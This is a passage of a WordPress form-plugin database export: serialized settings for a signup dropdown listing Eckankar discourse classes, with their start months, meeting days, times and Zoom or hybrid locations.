Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}}','options','a:17:{i:0;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:0;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:78:\"The Easy Way Discourses - STARTS IN DECEMBER -- 1st Thursday at 7:00 pm - Zoom\";s:5:\"value\";s:77:\"The Easy Way Discourses - STARTS IN DECEMBER -- 1st Thursday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:1;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:1;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:79:\"The ECK Dream 1 Discourses - STARTS IN NOVEMBER -- 3rd Monday at 7:00 pm - Zoom\";s:5:\"value\";s:78:\"The ECK Dream 1 Discourses - STARTS IN NOVEMBER -- 3rd Monday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:2;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:80:\"The ECK Dream 2 Discourses - STARTS IN NOVEMBER - 1st Thursday at 6:45 pm - Zoom\";s:5:\"value\";s:80:\"The ECK Dream 2 Discourses - STARTS IN NOVEMBER - 1st Thursday at 645 pm -  Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:3;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:4;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:81:\"Letters of Light and Sound 1 - STARTS IN FEBRUARY -- 2nd Tuesday at 700 pm - Zoom\";s:5:\"value\";s:81:\"Letters of Light and Sound 1 - STARTS IN FEBRUARY -- 2nd Tuesday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:4;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:5;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:81:\"Soul Travel 1 - STARTS IN NOVEMBER -- 3rd Saturday at 9:30 am - Florence - Hybrid\";s:5:\"value\";s:80:\"Soul Travel 1 - STARTS IN NOVEMBER -- 3rd Saturday at 930 am - Florence - Hybrid\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:5;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:6;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:67:\"Soul Travel 1 - STARTS IN NOVEMBER -- 2nd Tuesday at 7:00 pm - Zoom\";s:5:\"value\";s:66:\"Soul Travel 1 - STARTS IN NOVEMBER -- 2nd Tuesday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:6;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:7;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:64:\"Soul Travel 1 - STARTS IN MARCH -- 3rd Tuesday at 7:00 pm - Zoom\";s:5:\"value\";s:63:\"Soul Travel 1 - STARTS IN MARCH -- 3rd Tuesday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:7;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:8;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:76:\"Soul Travel 2 - STARTS IN NOVEMBER -- 3rd Sunday at 9:00 – 10:15 am - Zoom\";s:5:\"value\";s:71:\"Soul Travel 2 - STARTS IN NOVEMBER -- 3rd Sunday at 900  1015 am - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:8;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:9;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:77:\"The Secret Way - STARTS IN NOVEMBER -- 3rd Sunday at 9:00 – 10:15 am - Zoom\";s:5:\"value\";s:72:\"The Secret Way - STARTS IN NOVEMBER -- 3rd Sunday at 900  1015 am - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:9;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:10;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:90:\"The Precepts of Eckankar - STARTS IN NOVEMBER -- 1st Sunday at 11:45 am – 1:00 pm - Zoom\";s:5:\"value\";s:85:\"The Precepts of Eckankar - STARTS IN NOVEMBER -- 1st Sunday at 1145 am  100 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:10;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:11;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:87:\"The Precepts of Eckankar - STARTS IN NOVEMBER -- 1st Sunday at 12:00 – 1:30 pm - Zoom\";s:5:\"value\";s:82:\"The Precepts of Eckankar - STARTS IN NOVEMBER -- 1st Sunday at 1200  130 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:11;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:13;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:99:\"The ECK Satsang Discourses – First Series - STARTS IN NOVEMBER -- 2nd Wednesday at 7:00 pm - Zoom\";s:5:\"value\";s:95:\"The ECK Satsang Discourses  First Series - STARTS IN NOVEMBER -- 2nd Wednesday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:12;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:15;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:99:\"The ECK Satsang Discourses – Third Series - STARTS IN NOVEMBER -- 1st Wednesday at 7:00 pm - Zoom\";s:5:\"value\";s:95:\"The ECK Satsang Discourses  Third Series - STARTS IN NOVEMBER -- 1st Wednesday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:13;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:16;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:97:\"The ECK Satsang Discourses – Fourth Series - STARTS IN DECEMBER -- 2nd Monday at 7:00 pm - Zoom\";s:5:\"value\";s:93:\"The ECK Satsang Discourses  Fourth Series - STARTS IN DECEMBER -- 2nd Monday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 